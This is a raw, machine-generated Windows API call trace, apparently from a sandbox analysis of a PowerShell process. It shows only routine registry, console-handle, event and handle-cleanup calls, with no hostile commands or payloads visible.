[0255.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x3c8) returned 0x0 [0255.834] RegQueryValueExW (in: hKey=0x3c8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0256.858] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0256.863] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0256.864] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0256.869] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0256.869] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0256.874] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0256.875] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0256.875] CloseHandle (hObject=0xf) returned 1 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3e4 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ec [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3f8 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3fc [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x690 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x694 [0256.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x698 [0256.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x69c [0256.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a0 [0256.877] SetEvent (hEvent=0x3ec) returned 1 [0256.877] SetEvent (hEvent=0x3e8) returned 1 [0256.877] SetEvent (hEvent=0x3e4) returned 1 [0256.877] SetEvent (hEvent=0x3f0) returned 1 [0256.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a4 [0256.877] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x6a8) returned 0x0 [0256.877] RegQueryValueExW (in: hKey=0x6a8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0257.832] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0257.836] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0257.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0257.840] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0257.840] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0257.844] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0257.844] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0257.844] CloseHandle (hObject=0xf) returned 1 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x550 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x554 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x418 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x41c [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x420 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x42c [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430 [0257.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x434 [0257.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x438 [0257.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x43c [0257.846] SetEvent (hEvent=0x41c) returned 1 [0257.846] SetEvent (hEvent=0x550) returned 1 [0257.846] SetEvent (hEvent=0x554) returned 1 [0257.846] SetEvent (hEvent=0x418) returned 1 [0257.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x440 [0257.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x444) returned 0x0 [0257.846] RegQueryValueExW (in: hKey=0x444, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0259.249] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0259.254] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0259.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0259.260] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0259.260] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0259.265] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0259.265] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0259.266] CloseHandle (hObject=0xf) returned 1 [0259.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x568 [0259.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x564 [0259.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x570 [0259.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x56c [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x574 [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x578 [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x57c [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x768 [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x764 [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x76c [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x770 [0259.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x774 [0259.267] SetEvent (hEvent=0x56c) returned 1 [0259.267] SetEvent (hEvent=0x568) returned 1 [0259.267] SetEvent (hEvent=0x564) returned 1 [0259.267] SetEvent (hEvent=0x570) returned 1 [0259.268] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x778 [0259.268] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x77c) returned 0x0 [0259.268] RegQueryValueExW (in: hKey=0x77c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 Thread: id = 19 os_tid = 0x8c0 Thread: id = 20 os_tid = 0x8d0 Thread: id = 21 os_tid = 0x8e0 Thread: id = 22 os_tid = 0x8f0 Thread: id = 23 os_tid = 0x900 Thread: id = 24 os_tid = 0x910 [0095.507] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0101.084] CloseHandle (hObject=0x32c) returned 1 [0101.085] CloseHandle (hObject=0x13) returned 1 [0101.085] CloseHandle (hObject=0xf) returned 1 [0101.086] RegCloseKey (hKey=0x318) returned 0x0 [0101.086] RegCloseKey (hKey=0x314) returned 0x0 [0101.086] RegCloseKey (hKey=0x310) returned 0x0 [0101.086] LocalFree (hMem=0x20a7e0) returned 0x0 [0101.087] RegCloseKey (hKey=0x340) returned 0x0 [0101.087] LocalFree (hMem=0x20a810) returned 0x0 [0108.085] RegCloseKey (hKey=0x340) returned 0x0 [0113.524] RegCloseKey (hKey=0x310) returned 0x0 [0113.524] RegCloseKey (hKey=0x340) returned 0x0 [0125.801] RegCloseKey (hKey=0x3a8) returned 0x0 [0125.801] RegCloseKey (hKey=0x3a4) returned 0x0 [0125.802] RegCloseKey (hKey=0x380) returned 0x0 [0125.802] RegCloseKey (hKey=0x3bc) returned 0x0 [0125.803] RegCloseKey (hKey=0x39c) returned 0x0 [0125.803] RegCloseKey (hKey=0x398) returned 0x0 [0125.803] RegCloseKey (hKey=0x394) returned 0x0 [0125.804] RegCloseKey (hKey=0x390) returned 0x0 [0125.804] RegCloseKey (hKey=0x38c) returned 0x0 [0125.804] RegCloseKey (hKey=0x388) returned 0x0 [0125.805] RegCloseKey (hKey=0x384) returned 0x0 [0125.805] RegCloseKey (hKey=0x35c) returned 0x0 [0125.805] RegCloseKey (hKey=0x3b8) returned 0x0 [0125.805] RegCloseKey (hKey=0x3b4) returned 0x0 [0125.806] RegCloseKey (hKey=0x37c) returned 0x0 [0125.806] RegCloseKey (hKey=0x378) returned 0x0 [0125.807] RegCloseKey (hKey=0x374) returned 0x0 [0125.807] RegCloseKey (hKey=0x370) returned 0x0 [0125.807] RegCloseKey (hKey=0x36c) returned 0x0 [0125.807] RegCloseKey (hKey=0x368) returned 0x0 [0125.808] RegCloseKey (hKey=0x364) returned 0x0 [0125.808] RegCloseKey (hKey=0x360) returned 0x0 [0125.809] RegCloseKey (hKey=0x3b0) returned 0x0 [0125.809] RegCloseKey (hKey=0x350) returned 0x0 [0125.809] RegCloseKey (hKey=0x34c) returned 0x0 [0125.810] RegCloseKey (hKey=0x348) returned 0x0 [0125.810] RegCloseKey (hKey=0x344) returned 0x0 [0125.810] RegCloseKey (hKey=0x32c) returned 0x0 [0125.811] RegCloseKey (hKey=0x318) returned 0x0 [0125.811] RegCloseKey (hKey=0x314) returned 0x0 [0125.811] RegCloseKey (hKey=0x310) returned 0x0 [0125.811] RegCloseKey (hKey=0x3ac) returned 0x0 [0238.427] RegCloseKey (hKey=0x370) returned 0x0 [0238.428] CloseHandle (hObject=0x1b) returned 1 [0238.435] CloseHandle (hObject=0x1f) returned 1 [0238.435] CloseHandle (hObject=0x27) returned 1 [0238.436] CloseHandle (hObject=0x17) returned 1 [0238.436] CloseHandle (hObject=0x13) returned 1 [0238.437] CloseHandle (hObject=0x23) returned 1 [0254.754] CloseHandle (hObject=0x394) returned 1 [0254.754] RegCloseKey (hKey=0x744) returned 0x0 [0254.754] RegCloseKey (hKey=0x530) returned 0x0 [0254.754] CloseHandle (hObject=0x52c) returned 1 [0254.755] CloseHandle (hObject=0x528) returned 1 [0254.755] CloseHandle (hObject=0x524) returned 1 [0254.755] CloseHandle (hObject=0x520) returned 1 [0254.755] CloseHandle (hObject=0x51c) returned 1 [0254.755] CloseHandle (hObject=0x518) returned 1 [0254.756] CloseHandle (hObject=0x514) returned 1 [0254.756] CloseHandle (hObject=0x510) returned 1 [0254.756] CloseHandle (hObject=0x50c) returned 1 [0254.756] CloseHandle (hObject=0x504) returned 1 [0254.757] CloseHandle (hObject=0x508) returned 1 [0254.757] CloseHandle (hObject=0x4fc) returned 1 [0254.757] CloseHandle (hObject=0x500) returned 1 [0254.757] CloseHandle (hObject=0x4b) returned 1 [0254.778] CloseHandle (hObject=0x3a4) returned 1 [0254.778] CloseHandle (hObject=0x380) returned 1 [0254.778] CloseHandle (hObject=0x3bc) returned 1 [0254.779] CloseHandle (hObject=0x39c) returned 1 [0254.779] CloseHandle (hObject=0x370) returned 1 [0254.779] CloseHandle (hObject=0x5f0) returned 1 [0254.779] CloseHandle (hObject=0x5e8) returned 1 [0254.780] CloseHandle (hObject=0x5ec) returned 1 [0254.780] CloseHandle (hObject=0x5e0) returned 1 [0254.780] CloseHandle (hObject=0x5e4) returned 1 [0254.780] CloseHandle (hObject=0x6f) returned 1 [0254.784] CloseHandle (hObject=0x6b) returned 1 [0254.791] CloseHandle (hObject=0x604) returned 1 [0254.791] CloseHandle (hObject=0x600) returned 1 [0254.792] CloseHandle (hObject=0x5fc) returned 1 [0254.792] CloseHandle (hObject=0x5f8) returned 1 [0254.792] CloseHandle (hObject=0x5f4) returned 1 [0254.793] RegCloseKey (hKey=0x3a8) returned 0x0 [0254.793] CloseHandle (hObject=0x67) returned 1 [0254.794] CloseHandle (hObject=0x7f) returned 1 [0254.794] CloseHandle (hObject=0xab) returned 1 [0254.795] CloseHandle (hObject=0xa7) returned 1 [0254.795] CloseHandle (hObject=0xa3) returned 1 [0254.796] CloseHandle (hObject=0xb3) returned 1 [0254.796] CloseHandle (hObject=0xaf) returned 1 [0254.797] CloseHandle (hObject=0x398) returned 1 [0254.797] RegCloseKey (hKey=0x7dc) returned 0x0 [0254.797] CloseHandle (hObject=0x47) returned 1 [0254.798] CloseHandle (hObject=0x43) returned 1 [0254.798] CloseHandle (hObject=0x740) returned 1 [0254.799] CloseHandle (hObject=0x73c) returned 1 [0254.799] CloseHandle (hObject=0x738) returned 1 [0254.799] RegCloseKey (hKey=0x6f8) returned 0x0 [0254.799] CloseHandle (hObject=0x6f4) returned 1 [0254.800] CloseHandle (hObject=0x6f0) returned 1 [0254.800] CloseHandle (hObject=0x6ec) returned 1 [0254.800] CloseHandle (hObject=0x6e8) returned 1 [0254.800] CloseHandle (hObject=0x6e4) returned 1 [0254.801] CloseHandle (hObject=0x6e0) returned 1 [0254.801] CloseHandle (hObject=0x6dc) returned 1 [0254.801] CloseHandle (hObject=0x6d8) returned 1 [0254.801] CloseHandle (hObject=0x6d4) returned 1 [0254.801] CloseHandle (hObject=0x6cc) returned 1 [0254.802] CloseHandle (hObject=0x6d0) returned 1 [0254.802] CloseHandle (hObject=0x6c4) returned 1 [0254.802] CloseHandle (hObject=0x6c8) returned 1 [0254.802] CloseHandle (hObject=0x93) returned 1 [0254.803] CloseHandle (hObject=0x8f) returned 1 [0254.803] CloseHandle (hObject=0x8b) returned 1 [0254.804] CloseHandle (hObject=0x734) returned 1 [0254.804] CloseHandle (hObject=0x730) returned 1 [0254.804] CloseHandle (hObject=0x72c) returned 1 [0254.804] CloseHandle (hObject=0x728) returned 1 [0254.804] CloseHandle (hObject=0x724) returned 1 [0254.804] CloseHandle (hObject=0x720) returned 1 [0254.804] CloseHandle (hObject=0x718) returned 1 [0254.805] CloseHandle (hObject=0x71c) returned 1 [0254.805] CloseHandle (hObject=0x710) returned 1 [0254.805] CloseHandle (hObject=0x714) returned 1 [0254.805] CloseHandle (hObject=0x9f) returned 1 [0254.806] CloseHandle (hObject=0x9b) returned 1 [0254.806] CloseHandle (hObject=0x97) returned 1 [0254.807] CloseHandle (hObject=0x36c) returned 1 [0254.807] CloseHandle (hObject=0x368) returned 1 [0254.807] CloseHandle (hObject=0x364) returned 1 [0254.807] RegCloseKey (hKey=0x5c8) returned 0x0 [0254.807] CloseHandle (hObject=0x5c4) returned 1 [0254.807] CloseHandle (hObject=0x5c0) returned 1 [0254.808] CloseHandle (hObject=0x5bc) returned 1 [0254.808] CloseHandle (hObject=0x5b8) returned 1 [0254.808] CloseHandle (hObject=0x5b4) returned 1 [0254.808] CloseHandle (hObject=0x5b0) returned 1 [0254.808] CloseHandle (hObject=0x5ac) returned 1 [0254.808] CloseHandle (hObject=0x5a8) returned 1 [0254.808] CloseHandle (hObject=0x5a4) returned 1 [0254.809] RegCloseKey (hKey=0x4e4) returned 0x0 [0254.809] CloseHandle (hObject=0x4e0) returned 1 [0254.809] CloseHandle (hObject=0x4dc) returned 1 [0254.809] CloseHandle (hObject=0x4d8) returned 1 [0254.809] CloseHandle (hObject=0x4d4) returned 1 [0254.809] CloseHandle (hObject=0x4d0) returned 1 [0254.810] CloseHandle (hObject=0x4cc) returned 1 [0254.810] CloseHandle (hObject=0x4c8) returned 1 [0254.810] CloseHandle (hObject=0x4c4) returned 1 [0254.810] CloseHandle (hObject=0x4c0) returned 1 [0254.810] CloseHandle (hObject=0x4b8) returned 1 [0254.810] CloseHandle (hObject=0x4bc) returned 1 [0254.810] CloseHandle (hObject=0x4b0) returned 1 [0254.811] CloseHandle (hObject=0x4b4) returned 1 [0254.811] CloseHandle (hObject=0x3f) returned 1 [0254.811] CloseHandle (hObject=0x3b) returned 1 [0254.812] CloseHandle (hObject=0x37) returned 1 [0254.812] CloseHandle (hObject=0x59c) returned 1 [0254.812] CloseHandle (hObject=0x5a0) returned 1 [0254.812] CloseHandle (hObject=0x594) returned 1 [0254.813] CloseHandle (hObject=0x598) returned 1 [0254.813] CloseHandle (hObject=0x63) returned 1 [0254.813] CloseHandle (hObject=0x5f) returned 1 [0254.814] CloseHandle (hObject=0x5b) returned 1 [0254.814] CloseHandle (hObject=0x360) returned 1 [0254.814] RegCloseKey (hKey=0x660) returned 0x0 [0254.814] CloseHandle (hObject=0x65c) returned 1 [0254.815] CloseHandle (hObject=0x658) returned 1 [0254.815] CloseHandle (hObject=0x654) returned 1 [0254.815] CloseHandle (hObject=0x650) returned 1 [0254.815] CloseHandle (hObject=0x64c) returned 1 [0254.815] CloseHandle (hObject=0x648) returned 1 [0254.815] CloseHandle (hObject=0x644) returned 1 [0254.816] CloseHandle (hObject=0x640) returned 1 [0254.816] CloseHandle (hObject=0x63c) returned 1 [0254.816] CloseHandle (hObject=0x634) returned 1 [0254.816] CloseHandle (hObject=0x638) returned 1 [0254.816] CloseHandle (hObject=0x62c) returned 1 [0254.816] CloseHandle (hObject=0x630) returned 1 [0254.816] CloseHandle (hObject=0x7b) returned 1 [0254.817] CloseHandle (hObject=0x77) returned 1 [0254.817] CloseHandle (hObject=0x73) returned 1 [0254.818] CloseHandle (hObject=0x3b0) returned 1 [0254.818] CloseHandle (hObject=0x350) returned 1 [0254.818] CloseHandle (hObject=0x34c) returned 1 [0254.818] CloseHandle (hObject=0x348) returned 1 [0254.818] CloseHandle (hObject=0x344) returned 1 [0254.819] CloseHandle (hObject=0x32c) returned 1 [0254.819] CloseHandle (hObject=0x318) returned 1 [0254.819] CloseHandle (hObject=0x314) returned 1 [0254.819] CloseHandle (hObject=0x310) returned 1 [0254.819] CloseHandle (hObject=0x390) returned 1 [0254.819] CloseHandle (hObject=0x2f0) returned 1 [0254.820] CloseHandle (hObject=0x170) returned 1 [0254.820] CloseHandle (hObject=0x16c) returned 1 [0254.820] CloseHandle (hObject=0x35c) returned 1 [0254.820] CloseHandle (hObject=0x384) returned 1 [0254.820] CloseHandle (hObject=0xb7) returned 1 [0254.821] RegCloseKey (hKey=0x790) returned 0x0 [0254.821] CloseHandle (hObject=0x78c) returned 1 [0254.821] CloseHandle (hObject=0x788) returned 1 [0254.821] CloseHandle (hObject=0x784) returned 1 [0254.821] CloseHandle (hObject=0x780) returned 1 [0254.821] RegCloseKey (hKey=0x498) returned 0x0 [0254.822] CloseHandle (hObject=0x494) returned 1 [0254.822] CloseHandle (hObject=0x490) returned 1 [0254.822] CloseHandle (hObject=0x48c) returned 1 [0254.822] CloseHandle (hObject=0x488) returned 1 [0254.822] CloseHandle (hObject=0x484) returned 1 [0254.822] CloseHandle (hObject=0x480) returned 1 [0254.822] CloseHandle (hObject=0x47c) returned 1 [0254.823] CloseHandle (hObject=0x478) returned 1 [0254.823] CloseHandle (hObject=0x474) returned 1 [0254.823] CloseHandle (hObject=0x46c) returned 1 [0254.823] CloseHandle (hObject=0x470) returned 1 [0254.823] CloseHandle (hObject=0x464) returned 1 [0254.823] CloseHandle (hObject=0x468) returned 1 [0254.824] CloseHandle (hObject=0x33) returned 1 [0254.824] CloseHandle (hObject=0x2f) returned 1 [0254.825] CloseHandle (hObject=0x2b) returned 1 [0254.825] CloseHandle (hObject=0x77c) returned 1 [0254.825] CloseHandle (hObject=0x778) returned 1 [0254.825] CloseHandle (hObject=0x774) returned 1 [0254.826] CloseHandle (hObject=0x770) returned 1 [0254.826] CloseHandle (hObject=0x76c) returned 1 [0254.826] CloseHandle (hObject=0x764) returned 1 [0254.826] CloseHandle (hObject=0x768) returned 1 [0254.826] RegCloseKey (hKey=0x57c) returned 0x0 [0254.826] CloseHandle (hObject=0x578) returned 1 [0254.827] CloseHandle (hObject=0x574) returned 1 [0254.827] CloseHandle (hObject=0x570) returned 1 [0254.827] CloseHandle (hObject=0x56c) returned 1 [0254.827] CloseHandle (hObject=0x568) returned 1 [0254.827] CloseHandle (hObject=0x564) returned 1 [0254.827] CloseHandle (hObject=0x560) returned 1 [0254.827] CloseHandle (hObject=0x55c) returned 1 [0254.828] CloseHandle (hObject=0x558) returned 1 [0254.828] RegCloseKey (hKey=0x44c) returned 0x0 [0254.828] CloseHandle (hObject=0x448) returned 1 [0254.828] CloseHandle (hObject=0x444) returned 1 [0254.828] CloseHandle (hObject=0x440) returned 1 [0254.828] CloseHandle (hObject=0x43c) returned 1 [0254.829] CloseHandle (hObject=0x438) returned 1 [0254.829] CloseHandle (hObject=0x434) returned 1 [0254.829] CloseHandle (hObject=0x430) returned 1 [0254.829] CloseHandle (hObject=0x42c) returned 1 [0254.829] CloseHandle (hObject=0x428) returned 1 [0254.829] CloseHandle (hObject=0x420) returned 1 [0254.829] CloseHandle (hObject=0x424) returned 1 [0254.830] CloseHandle (hObject=0x418) returned 1 [0254.830] CloseHandle (hObject=0x41c) returned 1 [0254.830] CloseHandle (hObject=0x27) returned 1 [0254.830] CloseHandle (hObject=0x23) returned 1 [0254.831] CloseHandle (hObject=0x1f) returned 1 [0254.831] CloseHandle (hObject=0x550) returned 1 [0254.831] CloseHandle (hObject=0x554) returned 1 [0254.832] CloseHandle (hObject=0x548) returned 1 [0254.832] CloseHandle (hObject=0x54c) returned 1 [0254.832] CloseHandle (hObject=0x57) returned 1 [0254.832] CloseHandle (hObject=0x53) returned 1 [0254.833] CloseHandle (hObject=0x4f) returned 1 [0254.833] CloseHandle (hObject=0x75c) returned 1 [0254.834] CloseHandle (hObject=0x760) returned 1 [0254.834] RegCloseKey (hKey=0x6ac) returned 0x0 [0254.834] CloseHandle (hObject=0x6a8) returned 1 [0254.834] CloseHandle (hObject=0x6a4) returned 1 [0254.834] CloseHandle (hObject=0x6a0) returned 1 [0254.834] CloseHandle (hObject=0x69c) returned 1 [0254.834] CloseHandle (hObject=0x698) returned 1 [0254.835] CloseHandle (hObject=0x694) returned 1 [0254.835] CloseHandle (hObject=0x690) returned 1 [0254.835] RegCloseKey (hKey=0x3fc) returned 0x0 [0254.835] CloseHandle (hObject=0x3f8) returned 1 [0254.835] CloseHandle (hObject=0x3f4) returned 1 [0254.835] CloseHandle (hObject=0x3f0) returned 1 [0254.835] CloseHandle (hObject=0x3ec) returned 1 [0254.835] CloseHandle (hObject=0x3e8) returned 1 [0254.835] CloseHandle (hObject=0x3e4) returned 1 [0254.836] CloseHandle (hObject=0x3e0) returned 1 [0254.836] CloseHandle (hObject=0x3dc) returned 1 [0254.836] CloseHandle (hObject=0x3d8) returned 1 [0254.836] CloseHandle (hObject=0x3d0) returned 1 [0254.836] CloseHandle (hObject=0x3d4) returned 1 [0254.836] CloseHandle (hObject=0x3c8) returned 1 [0254.836] CloseHandle (hObject=0x3cc) returned 1 [0254.836] CloseHandle (hObject=0x1b) returned 1 [0254.837] CloseHandle (hObject=0x17) returned 1 [0254.837] CloseHandle (hObject=0x13) returned 1 [0254.838] CloseHandle (hObject=0x68c) returned 1 [0254.838] CloseHandle (hObject=0x688) returned 1 [0254.838] CloseHandle (hObject=0x680) returned 1 [0254.838] CloseHandle (hObject=0x684) returned 1 [0254.838] CloseHandle (hObject=0x678) returned 1 [0254.838] CloseHandle (hObject=0x67c) returned 1 [0254.838] CloseHandle (hObject=0x87) returned 1 [0254.839] CloseHandle (hObject=0x83) returned 1 [0254.839] RegCloseKey (hKey=0x614) returned 0x0 [0254.839] CloseHandle (hObject=0x610) returned 1 [0254.839] CloseHandle (hObject=0x60c) returned 1 [0254.839] CloseHandle (hObject=0x608) returned 1 Thread: id = 25 os_tid = 0xb0 [0127.258] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0127.482] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0127.525] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0127.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0127.525] CoTaskMemFree (pv=0x2af7b0) [0127.527] VirtualQuery (in: lpAddress=0x1c9ad7c0, lpBuffer=0x1c9ae680, dwLength=0x30 | out: lpBuffer=0x1c9ae680*(BaseAddress=0x1c9ad000, AllocationBase=0x1c020000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0127.685] 